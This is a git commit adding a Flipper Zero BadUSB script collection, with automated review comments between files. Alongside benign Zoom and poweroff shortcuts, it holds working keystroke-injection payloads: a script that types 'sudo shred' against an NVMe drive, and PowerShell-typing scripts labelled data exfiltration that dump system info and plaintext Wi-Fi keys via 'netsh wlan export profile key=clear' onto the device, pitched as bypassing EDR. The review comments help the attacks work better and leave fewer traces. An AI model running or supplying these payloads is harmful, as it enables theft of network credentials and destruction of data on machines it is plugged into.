Added emptythevoid's BadUSB collection
This commit is contained in:
parent
70856507e4
commit
24f5187975
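--- a/BadUSB/emptythevoid-BadUSB/Linux_helpers/README.md
+++ b/BadUSB/emptythevoid-BadUSB/Linux_helpers/README.md
@@ -0,0 +1,6 @@
+A collection of BadUSB scripts to assist on Linux
+
+poweroff_linux.txt opens a terminal and runs the 'poweroff' command.
+
+shred_nvme_live_ubuntu_mate.txt is intended to be used in conjuncton with an Ubuntu Mate LiveUSB to boot a system
+and then run sudo shred -vn1 on /dev/nvme0n1 Since it's a LiveUSB, sudo will not ask for a password. Refer to the script for further instructions.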
@ -0,0 +1,8 @@
|
||||
REM Power off Linux from terminal
|
||||
|
||||
DELAY 500
|
||||
CTRL-ALT T
|
||||
DELAY 1000
|
||||
STRING poweroff
|
||||
ENTER
|
||||
|
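Review bot: `STRING poweroff` (L51) is typed with no fallback if the command asks for authentication: on systemd desktops polkit usually lets the active local session power off without a password, but when another user is logged in or the policy is stricter the command prompts and the script stalls at that prompt with nothing typed. `CTRL-ALT T` (L45) is also a GNOME/Ubuntu default binding rather than a Linux-wide one. I would state both assumptions in the header, e.g. `REM Assumes CTRL-ALT T opens a terminal (GNOME/Ubuntu default) and that polkit lets the active session run poweroff without a password`.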
@ -0,0 +1,18 @@
|
||||
REM Using an Ubuntu Mate Desktop bootable flash drive booted as a Live USB
|
||||
REM this script will run the shred command on the first nvme drive the system is aware of (change as needed)
|
||||
|
||||
REM Run this once you're at the Install prompt
|
||||
|
||||
REM Press Try Ubuntu Mate and then wait for manual button press on Flipper
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
|
||||
REM Run this only after the desktop has fully booted
|
||||
DELAY 500
|
||||
CTRL-ALT T
|
||||
DELAY 1000
|
||||
STRING sudo shred -vn1 /dev/nvme0n1
|
||||
ENTER
|
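Review bot: `sudo shred -vn1 /dev/nvme0n1` (L106) overwrites only the LBAs the controller currently maps, so on an NVMe SSD wear-levelled and over-provisioned blocks are not touched and a single random pass is not a reliable erase. For a real wipe the drive's own erase path is the right tool — `nvme format /dev/nvme0 --ses=1` or `nvme sanitize` from nvme-cli on the live system — with shred kept as the fallback for drives that lack it. The target device is also hard-coded and runs with no confirmation the moment the desktop is up, so I would add next to L64: `REM Verify the target with lsblk first. shred cannot reach remapped/over-provisioned flash; prefer nvme format --ses=1 or nvme sanitize on NVMe`.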
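--- a/BadUSB/emptythevoid-BadUSB/ReadMe.md
+++ b/BadUSB/emptythevoid-BadUSB/ReadMe.md
@@ -0,0 +1 @@
+This collection is from emptythevoid! [Updates may be available here](https://github.com/emptythevoid/flipperzero/tree/main/badusb).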
@ -0,0 +1,4 @@
|
||||
REM Demo Zoom Mute toggle for MacOS
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
GUI-SHIFT A
|
@ -0,0 +1,4 @@
|
||||
REM Demo Zoom Mute toggle for MacOS
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
GUI-SHIFT V
|
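Review bot: The header at L138 says `REM Demo Zoom Mute toggle for MacOS` but the script sends `GUI-SHIFT V`, which is Zoom's video toggle; the mute script at L125-L133 is the one sending `GUI-SHIFT A`, so this comment was copied across unchanged. Change L138 to `REM Demo Zoom Video toggle for MacOS` so the two scripts can be told apart from their headers, as the Windows pair at L151/L164 already can.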
@ -0,0 +1,4 @@
|
||||
REM Keyboard shortcut to toggle Microphone Mute
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
ALT A
|
@ -0,0 +1,4 @@
|
||||
REM Keyboard shortcut to toggle the Video Camera
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
ALT V
|
@ -0,0 +1,45 @@
|
||||
// Title: Read Data from Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.0
|
||||
// Category: PoC
|
||||
// Desc: This script will read in a small payload from the Flipper's SD card
|
||||
// over serial, possibly bypassing EDR. In this proof-of-concept, the "payload"
|
||||
// is saved to the current user's Desktop
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Read from Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
|
||||
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
|
||||
|
||||
// Commands to build the serial port
|
||||
badusb.println('1..600|%{Try{$port = New-Object System.IO.Ports.SerialPort;$COM=("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })");$port.PortName = $COM;$port.BaudRate = "230400";$port.Parity = "None";$port.DataBits = 8;$port.StopBits = 1;$port.ReadTimeout = 9000;$port.DTREnable = $True;$port.open();$SPATH="/ext/apps_data/testfile.txt";$OPATH="C:\\users\\$env:username\\Desktop\\outfile.txt";Start-Sleep -m 500;$port.DiscardInBuffer();$port.Write("storage read $SPATH `r`n");Start-Sleep -m 500;$outfile = $port.ReadExisting();$outfileformat = $outfile.split([string[]]"`r`n", [StringSplitOptions]::None);$outfileformat[2..($outfileformat.length -3)] | Out-File $OPATH;$port.close();echo "done";exit;}Catch{Sleep 1}};');
|
||||
|
||||
// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
|
||||
// It will remove the temp information created earlier
|
||||
//badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit(); //automatically quit badusb and await serial connection
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
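Review bot: The read at L259 is a timing race: `Start-Sleep -m 500;$outfile = $port.ReadExisting()` returns whatever bytes have arrived in half a second, so a payload larger than a few hundred bytes or a slow CLI response is silently truncated and the `[2..($outfileformat.length -3)]` slice then strips the wrong lines. Read until the Flipper CLI prompt comes back instead, for example `$outfile = $port.ReadTo(">: ")` (assuming `>: ` is the prompt string — worth confirming), which also gives the `ReadTimeout` you set a purpose. The output path `C:\\users\\$env:username\\Desktop` assumes the profile lives under C:\users; `[Environment]::GetFolderPath("Desktop")`, which the base64 script at L1060 already uses, is the portable form.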
@ -0,0 +1,40 @@
|
||||
// Title: Save To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script runs the Get-ComputerInfo command and saves it to
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";');
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";');
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
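Review bot: `Catch{Sleep 1}` at L383 swallows every exception for up to 600 iterations, so a bad port-name expression, a missing driver or a `$SUSB` typo leaves a PowerShell window polling for ten minutes with no diagnostic, the opposite of the low-profile behaviour the header aims for. Retrying only makes sense for the "port not present yet" case; while developing put `Write-Host $_` in the catch, and in the final form break out on anything other than the `open()` failure rather than on every error. `let flipper = require("flipper");` (L336) is also unused in this script.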
@ -0,0 +1,45 @@
|
||||
// Title: Save Wifi To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script exfiltrates wifi profiles using export command by theb0ne
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
//badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear;') // Exports key material to temp directory in user's profile
|
||||
badusb.println('$d=Select-String -Path *.xml -Pattern "keyMaterial"|Out-String;') // Command to extract just the key material and save to $d
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); // path on the Flipper SD card to store data
|
||||
|
||||
// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
|
||||
// It will remove the temp information created earlier
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
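Review bot: The header comment at L432-L435 is a fragment — `This script exfiltrates wifi profiles using export command by theb0ne` runs straight into `the Flipper by it's serial interface`, the tail of the sentence copied from save_serial.js (L319-L322), so it never says where the data goes. Rewrite the two lines as `// Desc: This script exports the saved Wi-Fi profiles (netsh wlan export key=clear, per theb0ne), keeps the keyMaterial lines and writes them to` / `// the Flipper over its serial interface, which may bypass EDR`. The `New-Item` at L490 also uses a fixed directory name, so a second run on the same host reports that it already exists and carries on; that is benign but worth a word in the inline comment.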
@ -0,0 +1,40 @@
|
||||
// Title: Save To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script runs the Get-ComputerInfo command and saves it to
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";');
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";');
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
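Review bot: `which may bypass EDR` (L562) overstates what the technique achieves and should be qualified in the header: nothing is written to a removable volume, so removable-storage DLP and USB mass-storage blocking are sidestepped, but the typed command line is still visible to PowerShell script-block logging (event 4104) and process command-line auditing where those are enabled, and the Flipper enumerates as a PnP serial device. Suggested wording: `// the Flipper via its serial (COM) interface. This avoids removable-storage controls; the typed PowerShell is still subject to script-block and command-line logging.` The data is also framed only by the trailing `$p.Write("$([char] 3)")`, so a 0x03 byte inside `$d` would end the write early — not an issue for `Get-ComputerInfo` text, but worth a note if the script is reused for other content.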
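--- a/BadUSB/emptythevoid-BadUSB/badusb-js/save_wifi_serial.js
+++ b/BadUSB/emptythevoid-BadUSB/badusb-js/save_wifi_serial.js
@@ -0,0 +1,45 @@
+// Title: Save Wifi To Flipper via Serial (adapted to JS)
+// Author: emptythevoid and LupusE
+// Credit to Gas Station Hot Dog for improvements in filename generation
+// Target: Windows 10, Windows 11
+// Version: 1.2
+// Category: Data Exfiltration
+// Desc: This script exfiltrates wifi profiles using export command by theb0ne
+// the Flipper by it's serial interface, which may bypass EDR
+// By default, data is stored on the Flipper in the apps_data folder
+
+let badusb = require("badusb");
+let notify = require("notification");
+let flipper = require("flipper");
+let dialog = require("dialog");
+
+badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
+dialog.message("Save to Flipper Serial", "Press OK to start");
+
+if (badusb.isConnected()) {
+notify.blink("green", "short");
+
+badusb.press("GUI", "r");
+delay(500);
+
+badusb.println("powershell");
+delay(750);
+//badusb.println("$d=(Get-ComputerInfo|Out-String);");
+badusb.println('New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear;') // Exports key material to temp directory in user's profile
+badusb.println('$d=Select-String -Path *.xml -Pattern "keyMaterial"|Out-String;') // Command to extract just the key material and save to $d
+badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
+badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); // path on the Flipper SD card to store data
+
+// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
+// It will remove the temp information created earlier
+badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
+
+badusb.quit();
+
+
+
+notify.success();
+} else {
+print("USB not connected");
+notify.error();
+}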
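Review bot: The `cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse` cleanup at L756 sits inside the `Try` that only completes once the Flipper enumerates as a COM port, so if the serial step never succeeds the 600-retry loop simply ends and the `netsh wlan export profile key=clear` XML files — plaintext Wi-Fi PSKs — are left behind in the user's %TEMP%. `$d` already holds the extracted keyMaterial lines at L739, so the directory can be removed there, before the loop: `badusb.println('$d=Select-String -Path *.xml -Pattern "keyMaterial"|Out-String; Set-Location ..; Remove-Item "$env:temp/js2k3kd4nne5dhsk" -Recurse -Force;')`, with the `cd..;Remove-Item ...` dropped from the loop body (`-Force` covers hidden or read-only files). That way the on-disk secret exists only for the few hundred milliseconds the export takes, regardless of whether the exfil leg works.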
@ -0,0 +1,101 @@
|
||||
REM Base64 has to be broken up into chunks, otherwise Flipper crashes
|
||||
|
||||
REM Encode file to base64. On Linux:
|
||||
REM cat file.txt | base64 -w 0 > encoded.txt
|
||||
REM and then to prepend STRING to each line
|
||||
REM awk '{print "prefix" $0}' encoded.txt > encoded_string.txt
|
||||
REM then copy and paste, then remove the first STRING and replace with $b64="
|
||||
|
||||
REM May need to uncomment and adjust per-line delay. Otherwise it may stumble over itself
|
||||
REM particularly if the base64 is very large
|
||||
REM DEFAULTDELAY 100
|
||||
|
||||
REM slow down flipper string entry so keyboard buffer doesn't get broken
|
||||
REM not sure if needed or not
|
||||
STRING_DELAY 100
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM Base64 goes here. Make sure to start with $b64=" and end with ";
|
||||
STRING $b64="/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAd
|
||||
STRING Hx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3
|
||||
STRING Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAJQApgMBEQACEQED
|
||||
STRING EQH/xAAbAAEAAgMBAQAAAAAAAAAAAAAABAUBAgMGB//EADwQAAEDAgQEAwUFBgcBAAAAAAEAAgME
|
||||
STRING EQUSITFBUWFxEyKBBhQyQpEjUqGx4TNDcsHR8CQ0U2KCkvEV/8QAGgEBAAIDAQAAAAAAAAAAAAAA
|
||||
STRING AAEEAgMFBv/EAC8RAQABAwIDBQcFAQAAAAAAAAABAgMRBCESMWETQVFx8AUiIzKBkaFCscHh8RT/
|
||||
STRING 2gAMAwEAAhEDEQA/APuKAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
|
||||
STRING AgICDUuaOKDUyDgoyNDKRyUA2pjJsXDuNlOR2DgQCNQVIygICAgICAgICAgICAg1c4N3NkHMzfdF
|
||||
STRING 1GRo6Qnc2QcnTAdVCXMzE7eXugq8dximwXDZa+uk+zYLAA+Z7uDWjiSkj5u92K4rP79ieMVdHVy+
|
||||
STRING eCmppS1tO35QRxPfdc67rqoq+HTmI73Utez6Zo+JViZ7lvh3tfj+BBrcYg/+nSDeqpWgSAc3M2PW
|
||||
STRING 1lvtay3c25T1V72hu2t+cdHusA9q8Kx2HPQ1ccjgPNHez2d27hW8qeF41wcLtII6KUMoCAgICAgI
|
||||
STRING CAgIBQVtc8+ORyCgcBI4bFQluXFwuSgwg5VM8VNBJPUSCOKJpe97tmgcUkfM6mul9p8Tbi1RHIMN
|
||||
STRING pyRQUzhq88ZXDnyvsFztZqMfDonzdTQaXPxa4z4ebFbSGR7pckzS45nEEOtw2vy5H+d6VFfDHDn1
|
||||
STRING 68XRromZ4o9eujEVZU0w+3+1j/1G8O/6/VTNqmv5eaIu1UfNy8fXrq1mw/D8RmbUwl9NWs1ZNA7I
|
||||
STRING 8H03U2796ztnMMLmmsX98YlZ0HtP7R4D5a+M4vRtOksFmzNHUbO/vVdCzrbdzadpcy9oLtveN4/L
|
||||
STRING 2/s97X4TjrB7lUtMgF3ROGV7e7TqruVHD0DHteMzXAg8lKGyAgICAgICAgIKyu/zDvRYiOiW42CA
|
||||
STRING UHz72vrJsexmXBG5o8MoXNNW7YzyEBzWfwgEFVNVqOxp935p5Luj0vbVZq+WHGqMjI446Zlm3yks
|
||||
STRING HwDouPbimZzU7tyaoiIpU9IcYjqz73F4bHNGVzHZhe/fUW4nkFarixNHubypW51EXMXIxCdKBHd8
|
||||
STRING b5PEbeztT9dLHn6rVHvc8LExjeObpJR09QM0LvBkBzDLt/1/sqO0rpnfeE9lRVy2ljJVUxLoXeKw
|
||||
STRING bsbw9Dv6H0UzNuvnsj4lHKco1TTYbibo5J2+71Q1jnjdkffoVnRXes7U7x4NVy1YvfPtPjCyocf9
|
||||
STRING psBcPFtjFFvmHlqGjvs71V+1rrde1W0ude9n3KN6d4/L2/s17aYX7QNc2llImjH2sEjckjO7TuOo
|
||||
STRING V2JUJh6RkjXi7CCOilDZAQEBAQEGDsgrqwf4k9gVA45VCWL2QLoIVdhVLWPMr2lkpFvEZoTyvzWi
|
||||
STRING 9Youx7yxY1NyzOaVBXYPUUt3NHiRD52DbuFy72iro3p3h17HtC3c2q2lT1Mc2UupZY2Pv+8bmafx
|
||||
STRING BH1VemYziqJ9fdarirGaJj67x/CrxJ+KROY4VBjp7We6KmzOaedrm4/HorVqLE7Y36yq3pvxOeLb
|
||||
STRING pDvSU/gRiqlxKoqhu3xXNa0Hta4358VruVcU8MURHl/rZbo4Y4prmrz/AMSqOSGQl7Ha8WEC439D
|
||||
STRING x26rXcpqiN4bbdUTO0uVdhcVTmcwmJ7hY20B+mx6/msrd+aNp5MLunivMxzRqGGuoneG58jrkZNi
|
||||
STRING 23G5H6LZcqt3Pea7dNy3PDz8P9ek9n8JZVY3FjBjye6texkjRbxXOBa7uB+fZW9BRVFEzM7Soe0q
|
||||
STRING 6JriIjd67xmxG/ihpHG+qv5w5sUzKTBikZsHvYeoKmKolPDMJ8crJRdjgVkxdEBAQEBBVYqTHVxP
|
||||
STRING Gxbb6f8AqiRyEgcOShLKDCDFzdBsHcja6CBX4RS1gOaPw5CPjaLX7jitFzT27nON1i1qrlraJzDz
|
||||
STRING lZgElEzyMPhN+anLm27tBXPu6W7TOad4dSxrLNcYmOGUNrA1gDBZu3NUZme90IxjZyfTtMhlYcsv
|
||||
STRING BxJcB07bbWWcV7YnkwmiM5jm5g1UTznPixi1zlGY3vew5DRTiiroj36eqfT0stdUCkp3FhcLyyN/
|
||||
STRING ds4nueH6LPTWJu178mvVajsaOq3rsSjooxR0DWtZG3K3Ls0K9qdVFmOCjm52l0c3546+Sklnml1k
|
||||
STRING lcel9PouTXduV/NLsUWrdHyw5h7mkZXkHvZYxVVE5iWU0xVGJhZ4bjFRSSAPeS2+vRXdPrq6ZxXv
|
||||
STRING ChqNBRXGaNpeyosTE0QebOaRuNwu1TVFUZhwqqZpnErGN7Xjym6zYt0BAQV+LxF0ccg+Q6+qiRAG
|
||||
STRING v6KEtwSOyDYG6CLV+8yO8GnPhNIu6c626Ac+q03Yu1e7RtHj/Tda7KmOOvfohw09XTBwa8BrBc53
|
||||
STRING 5o3ddfM0/ULRRbu2+U8vHl+d4/MLFdyzdxmOfhGJ/G0/iU6lqRPHnaHZb2BI0d1HMKzbuRcjMevL
|
||||
STRING oq3bc26uGfXn1d7g67FZtSFWYXS1V3FvhyH52CxPfmtN3TW7vON1qzq7tnlOyhrcKqaW7reLEPnj
|
||||
STRING F7dwuXe0ddveN4dezrrdzadpQNRYRsMkjjZjGjVxVemia6uGFqu5TRTxTyelo6MYVhcxfZ8xaXzP
|
||||
STRING HzOtw6C2i7tq1FqjEPO3bs3rmZeWZmewOebucLuPM8V52uZqqmqXpaYimmKYaSyZZmRA2LgXE24C
|
||||
STRING 231TluygnkayN0lnZWi7gTe44pE5nCN4blttFile+y87s00B2AuF2vZ1czbxPc4ftOiIriqO966j
|
||||
STRING d9kNdQbXXQcxNBuLrJDKAgwQHCxFwghT0DTrCcp+6dlGBCfG+N2WRpB/NQARLKDjV0sdXCYpb5b3
|
||||
STRING 0NtVru2qbtPDU2WrtVqripRz73BG65ZUHaMgZD/y4fT6LD4tFM/q9d/r6M/g3Kox7vj3/ZBFZVRg
|
||||
STRING vuchcS6aVhDL/dFtWjqVV7a7Rv3eMxOPLpHWYW+ws1bd/dETGfPrPSEyjxOKoLhfK9mjrkEE9HDQ
|
||||
STRING qza1NFzMd8eufJWu6Wu3ifH1yndOuDoFYVWrYo2vziNodzA1UcMMpqqmMTKNTU1Q2nmirao1OeRx
|
||||
STRING YTGG5WHZum9ue6TBnE5eSZC6mkdSy/tIdLcS3gfp/Neev2ZtVzEvS2b0XaIqhiopWTZbuLHt+Fw3
|
||||
STRING HNa8NsVYcvcXEtM8xe1puGBoaD3UYZcbo9pGw07/AKLGSJXXszARH70bhsrrM6tAtf6rtaG3NFrM
|
||||
STRING 97h+0bsV3OGO793qaI6OCvw5ywjN2BZIboCAgIMPaHtyuFweCCFLQjeEgf7SowIrmujdleCCoSAI
|
||||
STRING MFt90GjmFBWVGGmdxc+UeU/ZxlgLGjkW8e6qXNLNc71eW20fRct6uLfKnznO8/VD8ebDnlr3sLbW
|
||||
STRING EIcXBnUuPwjotHHXp5xM7eG+I657ob+zo1EZiJz47ZnpiOcrGDEGOe2OUGKVw8rXkebsdirlF+Jn
|
||||
STRING FW0+uUqdzT1UxmneP2845pgcDx1W5oQsTwyGua1ziY5m/BKz4m/1HRartmm7GKm6xqKrM5pUcuH4
|
||||
STRING lTOIMEVQOD43BpPcH+q5leiuR8u/4dWjXWquezn4GISeVmHSBx4vkYAPxWH/AB3p7mydXYj9X4kN
|
||||
STRING CyBwfi8rXDf3aDUH+Im1x9PVZ9jb0+Krs5nwhh/0XL+abMY6yvaXEaeqaBFdjmlpDXC2nRXrOqt3
|
||||
STRING dqXOvaS5a3q3XFIbSEdFaVFjAfKVMIdVIICAgICDV7GvbZwuEEOWjN80R9CoEcgtNnjKeqhJZBq+
|
||||
STRING MO33QQqmgY95lbmZLb9ow2PrzHQrVXYpqnMbT4x63+rdRfrpjhnePCfW30Qn0dQyLwKZ8MQNy+UM
|
||||
STRING sS7oOHdaZs3IjgoxHjP9fy3RftzVx1xM+EZ/nv8AJGhNZDOaeCMvLLF7ZZLtAPFrjr6arTbm9RVw
|
||||
STRING U7455nb78/3bq6bFdHaVTjPKYjf7clw15G49F0Yc3budA8EWumALbajTsokebx2CeKrNR4cj4JGA
|
||||
STRING F0bblhHTkVzdbYrqqiqmMutodRRTTwTOJRsOilq6mL3eKRsQN3yvYWADoDqStWmsV8cVYxEN2rv2
|
||||
STRING 4tzGd5exjflkuuw4ayo3Zmk8FMISVIICAgICAgINJI2PFnAIIstK5usZuOSjA4G4NiCCoSwUHHyS
|
||||
STRING 3blcx++otcJgRn0hZU+OCb5Cw24i9/w1WHBHFxdMM+0ng4OuWFkwLaKRkPI6oOjXtdxsUGSgyzzG
|
||||
STRING wB15ILTDyww3iIc29rjmphCUpBAQEBAQEBAQEGj42yCz2jugiSUz2ax+YclGBwLG6gtym1lCVS+l
|
||||
STRING xGge59DP7xETc09Q4nf7r9S38R2QZp8RpKqQQSNdS1R2hmAaXfwnZ3ogkSROZuNOaDkUGEBpvINS
|
||||
STRING g7Pc6zYoyWvk+YfK3iUF3RQtp6ZkbG5WtGg5LJDugICAgICAgICAgICDnLCyQeYa80EV9PIwXYcw
|
||||
STRING UCBWUNNXRmOpia9vJwUJbUdN7rTiHxHPDfhzuLjblc7oElO12rdCgiyROYfMPog5xkeKOiCzw+Fs
|
||||
STRING spkLTYbnn0UoWykEBAQEBAQEBAQEBAQEBBykgZJuLHmEEWSnfHqPMOixHHfTikpV7MWoKiV1PHUt
|
||||
STRING bNcgRv8AKXHpff0WPFGcMuzqxnGyPTB8lcI4mEknU/dCnO7HGz1MEQhiDBw3PNZodEBAQEBAQEBA
|
||||
STRING QEBAQEBAQEBBxlp2SakWdzCCtnwsGYSiGN0jdnDRYcLLinGEjDKA0xdJJ8btAOQWUQxWCkEBAQEB
|
||||
STRING AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBB//Z";
|
||||
|
||||
STRING $desktop = [Environment]::GetFolderPath("Desktop");
|
||||
STRING $filename = $desktop+"\file.jpg";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
STRING Invoke-Item $filename;
|
||||
|
||||
ENTER
|
